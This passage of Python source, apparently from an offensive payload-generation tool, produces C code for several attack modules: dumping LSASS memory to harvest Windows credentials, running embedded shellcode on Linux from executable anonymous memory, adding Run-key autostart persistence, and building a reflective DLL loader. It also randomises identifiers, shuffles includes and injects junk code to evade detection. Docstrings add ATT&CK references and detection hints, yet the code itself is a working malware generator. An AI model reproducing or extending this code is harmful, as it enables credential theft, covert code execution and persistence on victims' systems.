        Ret_code += "while (Process32Next(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}}\n"
        Ret_code += "CloseHandle(" + RandHandle + ");\n"
        # Relaunch only when no snapshot entry matched; second argument 0.
        Ret_code += "if (" + RandBool + " == FALSE ){WinExec(\"" + FilePath + "\",0);}}\n"

    # Poll interval: the "Timevar" text is passed to Sleep() verbatim, then
    # the brace closes a block opened earlier in the emitted text.
    Ret_code += "Sleep(" + WaitBeforeCheck + ");}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Post-processes the whole text; the result replaces Ret_code.
    # presumably inserts filler code around the "$:" markers — TODO confirm
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    # Close the wrapper opened above; appended after JunkInjector has run.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    # Output file name is fixed; where it lands depends on WriteSource.
    WriteSource("Source.c", Ret_code)
def Postex_C_DumpLsass_windows(ModOpt):
    """Build C source that dumps lsass.exe memory and write it to Source.c.

    The generated program walks a Toolhelp32 process snapshot, opens the
    process named "lsass.exe" with PROCESS_ALL_ACCESS and calls
    MiniDumpWriteDump with MiniDumpWithFullMemory into a file named
    "lsass.dmp" (relative path, CREATE_ALWAYS).

    Reviewer context (defensive): this is LSASS credential dumping,
    MITRE ATT&CK T1003.001. The behaviour is observable as a full-access
    handle request against lsass.exe (Sysmon Event ID 10), creation of a
    file named lsass.dmp (Sysmon Event ID 11) and use of dbghelp.dll.
    LSA protection (RunAsPPL), Credential Guard and the ASR rule "Block
    credential stealing from the Windows local security authority
    subsystem" are the usual mitigations.

    Args:
        ModOpt: option dict. Keys read here: "Outformat" ("exe" or "dll"),
            "Reflective", "DynImport", "JI", "JF", "EF". Keys written
            here when "DynImport" is true: "NtdllHandle", "Ker32Handle".

    Returns:
        None. The result is handed to WriteSource("Source.c", ...).
    """

    # Identifiers used in the generated C; varname_creator is defined
    # elsewhere (presumably returns a fresh random name - confirm).
    Randentry = varname_creator()
    RandhProcess = varname_creator()
    RandProcsnapshot = varname_creator()
    NdcMDWD = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    # IncludeShuffler is defined elsewhere; tlhelp32.h and dbghelp.h are
    # appended after it so they follow windows.h.
    Ret_code += IncludeShuffler(IncludeList)
    Ret_code += "#include <tlhelp32.h>\n"
    Ret_code += "#include <dbghelp.h>\n"

    # Entry point wrapper: plain main() for an EXE, DllMain guarded by
    # DLL_PROCESS_ATTACH for a DLL. The matching closers are appended at
    # the end of this function.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # With DynImport the generated code resolves APIs through
    # GetModuleHandle/GetProcAddress instead of the import table. The API
    # names are still emitted as plain string literals, so they remain
    # visible to string-based scanning of the compiled binary.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are text markers placed in the
    # generated source; presumably consumed by JunkInjector - confirm.
    Ret_code += "$:START\n"

    # WindowsDefend is defined elsewhere; its output is inserted verbatim.
    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(SpawnMultiProc)

    Ret_code += "$:EVA\n"

    # The output file name "lsass.dmp" and the variable names lsassHandle
    # and outFile are fixed literals, not randomized.
    Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
    Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"
    Ret_code += "HANDLE lsassHandle = NULL;\n"
    Ret_code += "HANDLE outFile = CreateFile(\"lsass.dmp\", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\n"

    if ModOpt["DynImport"] == True:

        # Dynamic-import variant of the process walk: each kernel32 API is
        # fetched by name, then called through a FARPROC.
        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()
        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"Process32Next\");\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"lsass.exe\") == 0){\n"
        Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"

    else:
        # Static-import variant of the same process walk. The
        # PROCESS_ALL_ACCESS request against lsass.exe is the access-mask
        # pattern that process-access telemetry keys on.
        Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"lsass.exe\") == 0){\n"
        Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"

    # In both variants MiniDumpWriteDump is looked up by name in
    # dbghelp.dll; the closing "}}}" ends the three blocks opened above.
    Ret_code += "FARPROC " + NdcMDWD + " = GetProcAddress(GetModuleHandle(\"dbghelp.dll\"),\"MiniDumpWriteDump\");\n"
    Ret_code += NdcMDWD + "(" + RandhProcess + "," + Randentry + ".th32ProcessID,outFile,MiniDumpWithFullMemory,NULL,NULL,NULL);}}}\n"
    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(SpawnMultiProc)

    # JunkInjector is defined elsewhere; the last argument is hard-coded
    # to False here rather than taken from ModOpt["JR"].
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    # Close main(), or the DLL_PROCESS_ATTACH block and DllMain.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def ShellInject_C_linux(ModOpt):
    """Build a Linux C program that runs an embedded byte buffer and write it to Source.c.

    The generated main() declares the payload as an unsigned char array,
    maps anonymous memory with mmap, optionally emits a decoder stub and
    an mprotect call, copies the buffer into the mapping and starts a
    thread whose start routine is the mapped address.

    Reviewer context (defensive): anonymous mappings that are, or become,
    PROT_EXEC and are then used as a thread entry point are the
    observable behaviour. Auditing mmap/mprotect calls that request
    PROT_EXEC on anonymous memory, and policies that deny executable
    anonymous memory (for example SELinux execmem), cover this pattern.

    Args:
        ModOpt: option dict. Keys read here: "Payload", "Encode", "Arch",
            "MemAlloc", "ExecMethod", "JI", "JF", "JR". Key written here:
            "Decoder".

    Returns:
        None. The result is handed to WriteSource("Source.c", ...).
    """

    Randbufname = varname_creator()

    # Arch, MemAlloc and ExecMethod are read into locals but the rest of
    # this function uses ModOpt[...] directly.
    Payload = ModOpt["Payload"]
    Encryption = ModOpt["Encode"]
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # EncryptionManager is defined elsewhere; per the inline comments it
    # returns (encoded payload, decoder stub or the string "False").
    DecodeKit = EncryptionManager(Encryption, Payload, Randbufname)
    Payload = DecodeKit[0]  # encoded shellcode
    ModOpt["Decoder"] = DecodeKit[
        1]  # decoder stub or string = False if decoder is not necessary

    # Randmem and Randinj are created but not referenced below.
    Randmem = varname_creator()
    Randptr = varname_creator()
    Randinj = varname_creator()

    Ret_code = ""

    Include_List = [
        "#include <stdlib.h>\n", "#include <unistd.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n",
        "#include <sys/mman.h>\n", "#include <math.h>\n",
        "#include <pthread.h>\n"
    ]

    Ret_code += IncludeShuffler(Include_List)

    Ret_code += "int main(int argc,char * argv[]){\n"

    # "$:START" / "$:END" are text markers placed in the generated
    # source; presumably consumed by JunkInjector - confirm.
    Ret_code += "$:START\n"

    Ret_code += "unsigned char " + Randbufname + "[] = \"" + ModOpt[
        "Payload"] + "\";\n"

    # Initial page protection: RWX only for "Heap_RWX", otherwise RW.
    if ModOpt["MemAlloc"] == "Heap_RWX":

        fl = "PROT_READ|PROT_WRITE|PROT_EXEC"
    else:
        fl = "PROT_READ|PROT_WRITE"

    Ret_code += "void * " + Randptr + " = mmap(0,sizeof(" + Randbufname + ")," + fl + ",MAP_PRIVATE|MAP_ANON,-1,0);\n"

    # The decoder is compared against the string "False", not the boolean.
    if ModOpt["Decoder"] != "False":

        Ret_code += ModOpt["Decoder"]

    # Two-stage modes emit an mprotect that adds PROT_EXEC to the mapping.
    if ModOpt["MemAlloc"] in ["Heap_RW/RX", "Heap_RW/RWX"]:

        if "RWX" in ModOpt["MemAlloc"]:

            fl = "PROT_READ|PROT_WRITE|PROT_EXEC"
        else:
            fl = "PROT_READ|PROT_EXEC"

        Ret_code += "mprotect(" + Randptr + ",sizeof(" + Randbufname + ")," + fl + ");\n"

    Ret_code += "memcpy(" + Randptr + "," + Randbufname + ", sizeof(" + Randbufname + "));\n"

    # The mapped region is passed as the thread start routine.
    Ret_code += "pthread_create(0,NULL," + Randptr + ",NULL);\n"

    Ret_code += "$:END\n"

    # JunkInjector is defined elsewhere; the fourth argument is the
    # literal 0 here instead of ModOpt["EF"].
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], 0,
                            ModOpt["JR"])

    Ret_code += "return 0;}"

    WriteSource("Source.c", Ret_code)
def Persistence_C_REG_windows(ModOpt):
    """Build C source that adds a registry Run-key autostart entry and write it to Source.c.

    The generated program resolves the full path of the module named by
    ModOpt["Binpath"], wraps it in double quotes and stores it as a
    REG_SZ value named ModOpt["Pname"] under the CurrentVersion Run key,
    in HKEY_LOCAL_MACHINE when ModOpt["Priv"] is true and in
    HKEY_CURRENT_USER otherwise. It then reopens the same key read-only.

    Reviewer context (defensive): this is Run-key persistence, MITRE
    ATT&CK T1547.001. The key path is a fixed string literal in every
    generated binary, and the write is visible to registry telemetry
    (Sysmon Event IDs 12 and 13 on the Run keys) and to autostart
    baselining; the value name is caller-chosen, so alerting should key
    on the path and on the target binary rather than on the name.

    Args:
        ModOpt: option dict. Keys read here: "Binpath", "Pname", "Priv",
            "Outformat", "Reflective", "DynImport", "AdvapiHandle",
            "Bufflen", "JI", "JF", "EF". Keys written here when
            "DynImport" is true: "NtdllHandle", "Ker32Handle".

    Returns:
        None. The result is handed to WriteSource("Source.c", ...).
    """

    FilePath = ModOpt["Binpath"]
    FakeAppname = ModOpt["Pname"]
    Elevated = ModOpt["Priv"]

    # Identifiers used in the generated C; varname_creator is defined
    # elsewhere (presumably returns a fresh random name - confirm).
    Randvarpath = varname_creator()
    Randvarpath2 = varname_creator()
    RandHKey = varname_creator()
    RandHKey2 = varname_creator()
    RandLResult = varname_creator()
    RandLResult2 = varname_creator()
    Randhandle = varname_creator()
    RandSZvalue = varname_creator()
    RandFSuccess = varname_creator()
    RandFSuccess2 = varname_creator()
    RandDWsize = varname_creator()
    RandDWsize2 = varname_creator()
    RandCount = varname_creator()
    RandRegtype = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList)

    # Entry point wrapper: main() for an EXE, DllMain guarded by
    # DLL_PROCESS_ATTACH for a DLL; closed at the end of this function.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # With DynImport, module handles are obtained by name and APIs are
    # later fetched with GetProcAddress. ModOpt["AdvapiHandle"] is read
    # here but not assigned in this function (the other two handles are).
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are text markers placed in the
    # generated source; presumably consumed by JunkInjector - confirm.
    Ret_code += "$:START\n"

    # WindowsDefend is defined elsewhere; its output is inserted verbatim.
    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(SpawnMultiProc)

    Ret_code += "$:EVA\n"

    # FilePath is placed inside a C string literal as given.
    Ret_code += "wchar_t " + Randvarpath + "[260];\n"
    Ret_code += "HMODULE " + Randhandle + " = LoadLibrary(TEXT(\"" + FilePath + "\"));\n"

    if ModOpt["DynImport"] == True:

        # NOTE(review): Randlpv and Randbufname are not defined in this
        # function as shown.
        NdcGMFNW = varname_creator()
        Ret_code += "FARPROC " + NdcGMFNW + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ", \"GetModuleFileNameW\");\n"
        Ret_code += NdcGMFNW + "(" + Randlpv + "," + Randbufname + "," + ModOpt[
            "Bufflen"] + ");\n"
    else:
        Ret_code += "GetModuleFileNameW(" + Randhandle + ", " + Randvarpath + ", 260);\n"

    # Build the registry value data: the module path wrapped in double
    # quotes followed by a space, in a 520-wchar buffer.
    Ret_code += "HKEY " + RandHKey + " = NULL;LONG " + RandLResult + " = 0;BOOL " + RandFSuccess + " = TRUE;\n"
    Ret_code += "DWORD " + RandDWsize + ";const size_t " + RandCount + " = 260*2;\n"
    Ret_code += "wchar_t " + RandSZvalue + "[260*2] = {};\n"
    Ret_code += "wcscpy_s(" + RandSZvalue + ", " + RandCount + ", L\"\\\"\");\n"
    Ret_code += "wcscat_s(" + RandSZvalue + ", " + RandCount + ", " + Randvarpath + ");\n"
    Ret_code += "wcscat_s(" + RandSZvalue + ", " + RandCount + ", L\"\\\" \");\n"

    # Open or create the Run key with KEY_WRITE | KEY_READ. The hive is
    # HKLM when Elevated is true, HKCU otherwise; the subkey path is the
    # same literal in all four branches.
    if ModOpt["DynImport"] == True:

        NdcRCEKW = varname_creator()
        Ret_code += "FARPROC " + NdcRCEKW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegCreateKeyExW\");\n"

        if Elevated == True:

            Ret_code += RandLResult + " = " + NdcRCEKW + "(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"
        else:
            Ret_code += RandLResult + " = " + NdcRCEKW + "(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"

    else:
        if Elevated == True:

            Ret_code += RandLResult + " = RegCreateKeyExW(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"
        else:
            Ret_code += RandLResult + " = RegCreateKeyExW(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"

    # On success, set the value (byte size = (wcslen + 1) * 2) and close
    # the key. This RegSetValueExW call is the write that registry
    # monitoring of the Run keys records.
    Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);\n"
    Ret_code += "if (" + RandFSuccess + "){\n"
    Ret_code += RandDWsize + " = (wcslen(" + RandSZvalue + ")+1)*2;\n"

    if ModOpt["DynImport"] == True:
        NdcRSKEW = varname_creator()
        NdcRCK = varname_creator()
        Ret_code += "FARPROC " + NdcRSKEW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegSetValueExW\");\n"
        Ret_code += "FARPROC " + NdcRCK + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegCloseKey\");\n"
        Ret_code += RandLResult + " = " + NdcRSKEW + "(" + RandHKey + ",L\"" + FakeAppname + "\", 0, REG_SZ, (BYTE*)" + RandSZvalue + ", " + RandDWsize + ");"
        Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);}\n"
        Ret_code += "if (" + RandHKey + " != NULL){" + NdcRCK + "(" + RandHKey + ");" + RandHKey + " = NULL;}\n"
    else:

        Ret_code += RandLResult + " = RegSetValueExW(" + RandHKey + ",L\"" + FakeAppname + "\", 0, REG_SZ, (BYTE*)" + RandSZvalue + ", " + RandDWsize + ");"
        Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);}\n"
        Ret_code += "if (" + RandHKey + " != NULL){RegCloseKey(" + RandHKey + ");" + RandHKey + " = NULL;}\n"

    # Second stage: declare a fresh key handle and buffer and reopen the
    # same Run key with KEY_READ. No query of the value is emitted in
    # this function after the open.
    Ret_code += "HKEY " + RandHKey2 + " = NULL;LONG " + RandLResult2 + " = 0;BOOL " + RandFSuccess2 + " = TRUE;DWORD " + RandRegtype + " = REG_SZ;\n"
    Ret_code += "wchar_t " + Randvarpath2 + "[260]  = {};DWORD " + RandDWsize2 + " = sizeof(" + Randvarpath + ");\n"

    if ModOpt["DynImport"] == True:

        NdcOKEW = varname_creator()

        Ret_code += "FARPROC " + NdcOKEW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ", \"RegOpenKeyExW\");\n"

        if Elevated == True:

            Ret_code += RandLResult2 + " = " + NdcOKEW + "(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"
        else:
            Ret_code += RandLResult2 + " = " + NdcOKEW + "(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"

    else:

        if Elevated == True:

            Ret_code += RandLResult2 + " = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"
        else:
            Ret_code += RandLResult2 + " = RegOpenKeyExW(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(SpawnMultiProc)

    # JunkInjector is defined elsewhere; the last argument is hard-coded
    # to False here rather than taken from ModOpt["JR"].
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    # Close main(), or the DLL_PROCESS_ATTACH block and DllMain.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def BuildReflectiveLoader(ModOpt):
    """Build ReflectiveLoader.c and ReflectiveLoader.h for a reflectively loadable DLL.

    The generated C exports a function named "ReflectiveLoader" that
    locates its own image in memory, finds kernel32 and ntdll through the
    PEB loader list, resolves four APIs by comparing name hashes,
    allocates a new region, copies headers and sections, resolves
    imports, applies base relocations and calls the image entry point.
    The header carries the typedefs, the rotate-right hash helpers and
    the PEB/loader structures the C file uses. The commented-out include
    guard suggests the code is derived from the public
    ReflectiveDLLInjection project - confirm.

    Reviewer context (defensive): this is reflective code loading, MITRE
    ATT&CK T1620. Only local identifiers are randomized; the export name
    "ReflectiveLoader", the six 32-bit hash constants and the rotate
    count HASH_KEY 13 are emitted unchanged on every run, and the loaded
    image lives in a private PAGE_EXECUTE_READWRITE region that is not
    backed by a file on disk. Those fixed values and that memory layout
    are what signatures and memory scanners can match.

    Args:
        ModOpt: option dict. "Arch" is read here ("x64" selects the
            64-bit PEB access); the dict is also passed to WindowsDefend.

    Returns:
        None. Output goes to WriteSource("ReflectiveLoader.c", ...) and
        WriteSource("ReflectiveLoader.h", ...).
    """

    # Export name is fixed; the commented option is not used.
    RLoader = "ReflectiveLoader"  #ModOpt["Loadername"]

    # Names for the four function-pointer typedefs. The same names are
    # used in the .c body and in the header typedefs written below.
    RandLoadLibDef = varname_creator()
    RandGetProcAddrDef = varname_creator()
    RandVirtualAllocDef = varname_creator()
    RandNtFlushInstrCacheDef = varname_creator()

    # Names for the generated function's locals. RandHinstance is created
    # but not referenced below.
    RandHinstance = varname_creator()
    RandSt1 = varname_creator()
    RandLoadLib = varname_creator()
    RandGetProcAddr = varname_creator()
    RandVirtualAlloc = varname_creator()
    RandNtFlushCache = varname_creator()
    Randflag = varname_creator()
    RandHValue = varname_creator()
    RandDllAddr = varname_creator()
    RandExportDir = varname_creator()
    RandOrdName = varname_creator()
    RandArrAddr = varname_creator()
    RandArrName = varname_creator()
    RandUint1 = varname_creator()
    RandUint2 = varname_creator()
    RandUint3 = varname_creator()
    RandUint4 = varname_creator()
    RandUint5 = varname_creator()
    RandHeader = varname_creator()
    RandBaseAddr = varname_creator()

    Ret_code = ""

    Include_List = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    Ret_code += IncludeShuffler(Include_List)

    Ret_code += "#include <tlhelp32.h>\n"
    Ret_code += "#include \"ReflectiveLoader.h\"\n"

    # _ReturnAddress is mapped to the GCC builtin; the helper below
    # returns the address of its caller, i.e. a pointer inside the
    # loader's own image.
    Ret_code += "#define _ReturnAddress() __builtin_return_address(0)\n"
    Ret_code += "HINSTANCE hAppInstance = NULL;\n"  #####
    Ret_code += "#pragma intrinsic( _ReturnAddress )\n"

    Ret_code += "__declspec(noinline) ULONG_PTR " + RandSt1 + "(VOID) { return (ULONG_PTR)_ReturnAddress(); }\n"

    Ret_code += "DLLEXPORT ULONG_PTR WINAPI " + RLoader + "(VOID){\n"

    # Local declarations of the generated loader function.
    Ret_code += RandLoadLibDef + " " + RandLoadLib + " = NULL;\n"
    Ret_code += RandGetProcAddrDef + " " + RandGetProcAddr + " = NULL;\n"
    Ret_code += RandVirtualAllocDef + " " + RandVirtualAlloc + " = NULL;\n"
    Ret_code += RandNtFlushInstrCacheDef + " " + RandNtFlushCache + " = NULL;\n"
    Ret_code += "ULONG_PTR " + RandDllAddr + " = " + RandSt1 + "();\n"
    Ret_code += "ULONG_PTR " + RandArrAddr + ";\n"
    Ret_code += "ULONG_PTR " + RandArrName + ";\n"
    Ret_code += "ULONG_PTR " + RandExportDir + ";\n"
    Ret_code += "ULONG_PTR " + RandOrdName + ";\n"
    Ret_code += "DWORD " + RandHValue + ";\n"
    Ret_code += "ULONG_PTR " + RandUint1 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint2 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint3 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint4 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint5 + ";\n"
    Ret_code += "ULONG_PTR " + RandHeader + ";\n"

    #Ret_code += "$:START\n"

    # WindowsDefend is defined elsewhere; its output is inserted verbatim.
    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += "$:EVA\n"

    # Stage 0: walk backwards one byte at a time from the return address
    # until an MZ header whose e_lfanew (bounded to < 1024) points at a
    # PE signature is found; that address is the loader's image base.
    Ret_code += "while(TRUE){\n"
    Ret_code += "if(((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_magic == IMAGE_DOS_SIGNATURE){\n"
    Ret_code += RandHeader + " = ((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_lfanew;\n"
    Ret_code += "if(" + RandHeader + " >= sizeof(IMAGE_DOS_HEADER) && " + RandHeader + " < 1024){\n"
    Ret_code += RandHeader + " += " + RandDllAddr + ";\n"
    Ret_code += "if(((PIMAGE_NT_HEADERS)" + RandHeader + ")->Signature == IMAGE_NT_SIGNATURE) break;}}\n"
    Ret_code += RandDllAddr + "--;}\n"

    # Stage 1: read the PEB pointer (gs:0x60 on x64, fs:0x30 otherwise)
    # and follow pLdr to the in-memory-order module list.
    if ModOpt["Arch"] == "x64":

        Ret_code += "ULONG_PTR " + RandBaseAddr + " = __readgsqword(0x60);\n"
    else:
        Ret_code += "ULONG_PTR " + RandBaseAddr + " = __readfsdword(0x30);\n"  # 32 bit

    Ret_code += RandBaseAddr + " = (ULONG_PTR)((_PPEB)" + RandBaseAddr + ")->pLdr;\n"
    Ret_code += RandUint1 + " = (ULONG_PTR)((PPEB_LDR_DATA)" + RandBaseAddr + ")->InMemoryOrderModuleList.Flink;\n"
    Ret_code += "while(" + RandUint1 + "){\n"
    Ret_code += "USHORT " + Randflag + ";\n"
    # Hash each module's BaseDllName byte by byte, upper-casing bytes
    # that are >= 'a', using the ror() helper from the header.
    Ret_code += RandUint2 + " = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->BaseDllName.pBuffer;\n"
    Ret_code += Randflag + " = ((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->BaseDllName.Length;\n"
    Ret_code += RandUint3 + " = 0;\n"
    Ret_code += "do{\n"
    Ret_code += RandUint3 + " = ror((DWORD)" + RandUint3 + " );\n"
    Ret_code += "if(*((BYTE *)" + RandUint2 + ") >= 'a'){\n"
    Ret_code += RandUint3 + " += *((BYTE *)" + RandUint2 + ") - 0x20;\n"
    Ret_code += "}else{\n"
    Ret_code += RandUint3 + " += *((BYTE *)" + RandUint2 + ");}\n"
    Ret_code += RandUint2 + "++;\n"
    Ret_code += "}while( --" + Randflag + ");\n"
    # 0x6A4ABC5B is the module hash the commented header defines call
    # KERNEL32DLL_HASH. Its export table is scanned for three name
    # hashes: 0xEC0E4E8E (LOADLIBRARYA_HASH), 0x7C0DFCAA
    # (GETPROCADDRESS_HASH) and 0x91AFCA54 (VIRTUALALLOC_HASH).
    Ret_code += "if((DWORD)" + RandUint3 + " == 0x6A4ABC5B){\n"
    Ret_code += RandBaseAddr + " = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->DllBase;\n"
    Ret_code += RandExportDir + " = " + RandBaseAddr + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr + ")->e_lfanew;\n"
    Ret_code += RandArrName + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];\n"
    Ret_code += RandExportDir + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress);\n"
    Ret_code += RandArrName + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfNames);\n"
    Ret_code += RandOrdName + " = ( " + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfNameOrdinals);\n"
    Ret_code += Randflag + " = 3;\n"
    Ret_code += "while(" + Randflag + " > 0){\n"
    Ret_code += RandHValue + " = hash((char *)(" + RandBaseAddr + " + *(DWORD *)(" + RandArrName + ")));\n"
